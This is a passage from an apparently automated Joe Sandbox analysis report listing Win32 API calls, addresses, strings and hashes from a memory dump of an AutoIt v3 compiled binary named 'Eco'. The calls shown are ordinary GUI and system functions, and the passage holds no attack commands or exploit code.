                          • GetClientRect.USER32(00000000,?), ref: 00587AEE
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00587B32
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00587B41
                          • GetStockObject.GDI32(00000011), ref: 00587B51
                          • SelectObject.GDI32(00000000,00000000), ref: 00587B55
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00587B65
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00587B6E
                          • DeleteDC.GDI32(00000000), ref: 00587B77
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00587BA3
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00587BBA
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00587BF5
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00587C09
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00587C1A
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00587C4A
                          • GetStockObject.GDI32(00000011), ref: 00587C55
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00587C60
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00587C6A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: 9f722d35f9d3a053fc4af937b711d3736ad7172f6f026cb5130b254096d79305
                          • Instruction ID: 6e6e52d3c943777ece39ffccd1f00f09249c9b909671ce5fd9c17330285dc18f
                          • Opcode Fuzzy Hash: 9f722d35f9d3a053fc4af937b711d3736ad7172f6f026cb5130b254096d79305
                          • Instruction Fuzzy Hash: EFA1AEB1A40619BFEB24DBA4DC4AFAF7BA9FB59310F004105FA15A72E0D770AD05DB60
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0057B1CE
                          • GetDriveTypeW.KERNEL32(?,005A2C4C,?,\\.\,005A0980), ref: 0057B2AB
                          • SetErrorMode.KERNEL32(00000000,005A2C4C,?,\\.\,005A0980), ref: 0057B409
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: e99966474532d4b0e2502c08b90c181e92ca4d9e5f115efea2db94b59a55ea05
                          • Instruction ID: 4b69b9fc9b2251d4d8df39239c27c0369b8e14ebe76944b37e33f4638b40743c
                          • Opcode Fuzzy Hash: e99966474532d4b0e2502c08b90c181e92ca4d9e5f115efea2db94b59a55ea05
                          • Instruction Fuzzy Hash: 8151D334640216EF9B04EB54FD9AFBD7FA1FB85300B20C859E40AA7291D7B19D81EB41
                          APIs
                          • GetSysColor.USER32(00000012), ref: 0059ACF0
                          • SetTextColor.GDI32(?,?), ref: 0059ACF4
                          • GetSysColorBrush.USER32(0000000F), ref: 0059AD0A
                          • GetSysColor.USER32(0000000F), ref: 0059AD15
                          • CreateSolidBrush.GDI32(?), ref: 0059AD1A
                          • GetSysColor.USER32(00000011), ref: 0059AD32
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059AD40
                          • SelectObject.GDI32(?,00000000), ref: 0059AD51
                          • SetBkColor.GDI32(?,00000000), ref: 0059AD5A
                          • SelectObject.GDI32(?,?), ref: 0059AD67
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0059AD86
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059AD9D
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0059ADB2
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059ADDA
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0059AE01
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0059AE1F
                          • DrawFocusRect.USER32(?,?), ref: 0059AE2A
                          • GetSysColor.USER32(00000011), ref: 0059AE38
                          • SetTextColor.GDI32(?,00000000), ref: 0059AE40
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0059AE54
                          • SelectObject.GDI32(?,0059A9E7), ref: 0059AE6B
                          • DeleteObject.GDI32(?), ref: 0059AE76
                          • SelectObject.GDI32(?,?), ref: 0059AE7C
                          • DeleteObject.GDI32(?), ref: 0059AE81
                          • SetTextColor.GDI32(?,?), ref: 0059AE87
                          • SetBkColor.GDI32(?,?), ref: 0059AE91
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 87742a44c24fbbd7c387c7270b85c95446516d97efcd992a1963bdf8c1c784b0
                          • Instruction ID: d2dd568510db125d5266d4c65f7496f8114f917559f822f1c8dceb0918472eae
                          • Opcode Fuzzy Hash: 87742a44c24fbbd7c387c7270b85c95446516d97efcd992a1963bdf8c1c784b0
                          • Instruction Fuzzy Hash: A5514871910208AFDF119FA4DC48EAEBBB9FF09320F205615F915AB2E1D7719944EFA0
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00598EAE
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00598EBF
                          • CharNextW.USER32(0000014E), ref: 00598EEE
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00598F2F
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00598F45
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00598F56
                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00598F73
                          • SetWindowTextW.USER32(?,0000014E), ref: 00598FC5
                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00598FDB
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0059900C
                          • _memset.LIBCMT ref: 00599031
                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0059907A
                          • _memset.LIBCMT ref: 005990D9
                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00599103
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0059915B
                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00599208
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0059922A
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00599274
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005992A1
                          • DrawMenuBar.USER32(?), ref: 005992B0
                          • SetWindowTextW.USER32(?,0000014E), ref: 005992D8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                          • String ID: 0
                          • API String ID: 1073566785-4108050209
                          • Opcode ID: a3ef3ec07defb4b21910fba979e4d6812be1d3614b52ff1159fa8199698969c3
                          • Instruction ID: 8b071992b8a60b910795f86ee53dd086e5a59bbc0365807ae0e519865cfcee58
                          • Opcode Fuzzy Hash: a3ef3ec07defb4b21910fba979e4d6812be1d3614b52ff1159fa8199698969c3
                          • Instruction Fuzzy Hash: 0AE17C74900219AFDF209F54CC88AFE7FB8FF46714F10815AF915AA291DB708A85DF60
                          APIs
                          • GetCursorPos.USER32(?), ref: 00594DCF
                          • GetDesktopWindow.USER32 ref: 00594DE4
                          • GetWindowRect.USER32(00000000), ref: 00594DEB
                          • GetWindowLongW.USER32(?,000000F0), ref: 00594E4D
                          • DestroyWindow.USER32(?), ref: 00594E79
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00594EA2
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00594EC0
                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00594EE6
                          • SendMessageW.USER32(?,00000421,?,?), ref: 00594EFB
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00594F0E
                          • IsWindowVisible.USER32(?), ref: 00594F2E
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00594F49
                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00594F5D
                          • GetWindowRect.USER32(?,?), ref: 00594F75
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00594F9B
                          • GetMonitorInfoW.USER32(00000000,?), ref: 00594FB5
                          • CopyRect.USER32(?,?), ref: 00594FCC
                          • SendMessageW.USER32(?,00000412,00000000), ref: 00595037
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: 49cdcc68d33f8fa79334a3c3c5ef1e3dd7c30bb996fb82648f366ebbf59f5a0b
                          • Instruction ID: 5017fc1f5e65dc1ee55c55f7f821b2c6b72b9a2453439f37cf711e7759c4907b
                          • Opcode Fuzzy Hash: 49cdcc68d33f8fa79334a3c3c5ef1e3dd7c30bb996fb82648f366ebbf59f5a0b
                          • Instruction Fuzzy Hash: A1B15770608741AFDB04DF64C988E6ABBE4BB89314F008A18F5999B291D771EC45CF92
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00574809
                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0057482F
                          • _wcscpy.LIBCMT ref: 0057485D
                          • _wcscmp.LIBCMT ref: 00574868
                          • _wcscat.LIBCMT ref: 0057487E
                          • _wcsstr.LIBCMT ref: 00574889
                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 005748A5
                          • _wcscat.LIBCMT ref: 005748EE
                          • _wcscat.LIBCMT ref: 005748F5
                          • _wcsncpy.LIBCMT ref: 00574920
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 699586101-1459072770
                          • Opcode ID: b904aac502b31fdf1dfdf84e2268797f24b9502638f814c37123611492fad93a
                          • Instruction ID: 6020802b4833e90426bc2833b6718bf8d278da8d826b4a31cf39a658ea7902fa
                          • Opcode Fuzzy Hash: b904aac502b31fdf1dfdf84e2268797f24b9502638f814c37123611492fad93a
                          • Instruction Fuzzy Hash: FB412972A002067BD714B7749C4BEBF7FACFF81720F004459F905A71D2EB349A01AAA5
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00512C8C
                          • GetSystemMetrics.USER32(00000007), ref: 00512C94
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00512CBF
                          • GetSystemMetrics.USER32(00000008), ref: 00512CC7
                          • GetSystemMetrics.USER32(00000004), ref: 00512CEC
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00512D09
                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00512D19
                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00512D4C
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00512D60
                          • GetClientRect.USER32(00000000,000000FF), ref: 00512D7E
                          • GetStockObject.GDI32(00000011), ref: 00512D9A
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00512DA5
                            • Part of subcall function 00512714: GetCursorPos.USER32(?), ref: 00512727
                            • Part of subcall function 00512714: ScreenToClient.USER32(005D67B0,?), ref: 00512744
                            • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000001), ref: 00512769
                            • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000002), ref: 00512777
                          • SetTimer.USER32(00000000,00000000,00000028,00511473), ref: 00512DCC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI$hZ
                          • API String ID: 1458621304-3588766029
                          • Opcode ID: 567934f0dd291dab4d4f5ace76c02a39edf19776648764993df4c2cb38fc4145
                          • Instruction ID: dcee2e26ea784791c4091a9809e865c58fa149bca74651d700bf377a9fb7d641
                          • Opcode Fuzzy Hash: 567934f0dd291dab4d4f5ace76c02a39edf19776648764993df4c2cb38fc4145
                          • Instruction Fuzzy Hash: 62B17D71A0120AAFEB14DFA8CC45BED7FA4FB58314F10462AFA15A72D0DB74A891DF50
                          APIs
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • GetForegroundWindow.USER32(005A0980,?,?,?,?,?), ref: 0053040E
                          • IsWindow.USER32(?), ref: 005664A0
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Foreground_memmove
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 3828923867-1919597938
                          • Opcode ID: 00d26cf9fe8e38c30c0faf95c52001cf0c7a2e554aa7b08d886b36558b1f8a87
                          • Instruction ID: bcf0fddbb1e20c75f3a9eec37a3de38fde136480dc80536e69a14c8e4a6ab331
                          • Opcode Fuzzy Hash: 00d26cf9fe8e38c30c0faf95c52001cf0c7a2e554aa7b08d886b36558b1f8a87
                          • Instruction Fuzzy Hash: 30D1B130104703AFCB08EF60D5959AABFA4BFA5344F405A1DF456936E2DB30ED69CB92
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00594274
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00594334
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 3974292440-719923060
                          • Opcode ID: 8c08ad16a0b269c1d0850cb0084300a7343452640fe45233fdaa1498cd5491e8
                          • Instruction ID: 7fded28d69543a0e4deb4517892808b7ff4ef4fa22ec4705a17294549f5913b7
                          • Opcode Fuzzy Hash: 8c08ad16a0b269c1d0850cb0084300a7343452640fe45233fdaa1498cd5491e8
                          • Instruction Fuzzy Hash: C1A16A702147029FDF14EF60C856E6ABBA9BFC5314F105968B86A9B2D2DB70EC46CF41
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 0056AF5E
                          • __swprintf.LIBCMT ref: 0056AFFF
                          • _wcscmp.LIBCMT ref: 0056B012
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0056B067
                          • _wcscmp.LIBCMT ref: 0056B0A3
                          • GetClassNameW.USER32(?,?,00000400), ref: 0056B0DA
                          • GetDlgCtrlID.USER32(?), ref: 0056B12C
                          • GetWindowRect.USER32(?,?), ref: 0056B162
                          • GetParent.USER32(?), ref: 0056B180
                          • ScreenToClient.USER32(00000000), ref: 0056B187
                          • GetClassNameW.USER32(?,?,00000100), ref: 0056B201
                          • _wcscmp.LIBCMT ref: 0056B215
                          • GetWindowTextW.USER32(?,?,00000400), ref: 0056B23B
                          • _wcscmp.LIBCMT ref: 0056B24F
                            • Part of subcall function 0053378E: _iswctype.LIBCMT ref: 00533796
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                          • String ID: %s%u
                          • API String ID: 3744389584-679674701
                          • Opcode ID: 8f34b599a5ab0204a05283759957f51624fc503e36f6427d77f2455341b7e942
                          • Instruction ID: 2581d924257e3238ee1742a625146c581ed198faff75dd5ae852f0558344f09f
                          • Opcode Fuzzy Hash: 8f34b599a5ab0204a05283759957f51624fc503e36f6427d77f2455341b7e942
                          • Instruction Fuzzy Hash: 73A1F171204706AFEB14DF64C898BAABFE8FF85354F004629F999D3190DB30E995CB91
                          APIs
                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0056B894
                          • _wcscmp.LIBCMT ref: 0056B8A5
                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0056B8CD
                          • CharUpperBuffW.USER32(?,00000000), ref: 0056B8EA
                          • _wcscmp.LIBCMT ref: 0056B908
                          • _wcsstr.LIBCMT ref: 0056B919
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0056B951
                          • _wcscmp.LIBCMT ref: 0056B961
                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0056B988
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0056B9D1
                          • _wcscmp.LIBCMT ref: 0056B9E1
                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0056BA09
                          • GetWindowRect.USER32(00000004,?), ref: 0056BA72
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                          • String ID: @$ThumbnailClass
                          • API String ID: 1788623398-1539354611
                          • Opcode ID: ba6442c6d40dfd48ca24d01177348898e53252bae2dc071b640a45ccd4fbfb8c
                          • Instruction ID: 15a6204c1bdfa8abf4ff3321e3021cdb82ece2bf05c7534eaa100d20fef146c3
                          • Opcode Fuzzy Hash: ba6442c6d40dfd48ca24d01177348898e53252bae2dc071b640a45ccd4fbfb8c
                          • Instruction Fuzzy Hash: 43817C710042069BEB14DF54C985FAA7FE8FF94714F048569EE85CB096DB30DE8ACBA1
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • DragQueryPoint.SHELL32(?,?), ref: 0059CA4A
                            • Part of subcall function 0059AF24: ClientToScreen.USER32(?,?), ref: 0059AF4D
                            • Part of subcall function 0059AF24: GetWindowRect.USER32(?,?), ref: 0059AFC3
                            • Part of subcall function 0059AF24: PtInRect.USER32(?,?,0059C437), ref: 0059AFD3
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0059CAB3
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0059CABE
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0059CAE1
                          • _wcscat.LIBCMT ref: 0059CB11
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0059CB28
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0059CB41
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0059CB58
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0059CB7A
                          • DragFinish.SHELL32(?), ref: 0059CB81
                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0059CC74
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr]
                          • API String ID: 169749273-3325259009
                          • Opcode ID: b7915a4365b68d57bbcd18e74851b4d6911e7216e3601fc7e04ff6f03008a358
                          • Instruction ID: 836f2fe047552a29f2c486a94030e64c2bd2b63431f6d138b218d779c32b07b1
                          • Opcode Fuzzy Hash: b7915a4365b68d57bbcd18e74851b4d6911e7216e3601fc7e04ff6f03008a358
                          • Instruction Fuzzy Hash: 45612571108301AFDB11EF64DC89E9BBFE8FBD9750F000A1EF595921A1DB709A49CB92
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
